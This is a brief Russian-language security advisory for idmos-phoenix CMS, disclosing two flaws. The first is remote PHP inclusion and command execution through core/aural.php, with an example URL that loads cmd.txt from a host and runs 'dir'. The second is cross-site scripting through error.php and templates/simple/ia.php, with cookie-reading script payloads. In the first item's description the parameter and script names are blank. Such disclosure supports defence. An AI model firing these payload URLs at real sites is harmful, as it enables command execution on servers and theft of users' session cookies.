Программа: idmos-phoenix cms

Уязвимость позволяет удаленному пользователю осуществить XSS нападение и выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «» сценарием . Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «err_msg» сценарием error.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>



Оставить мнение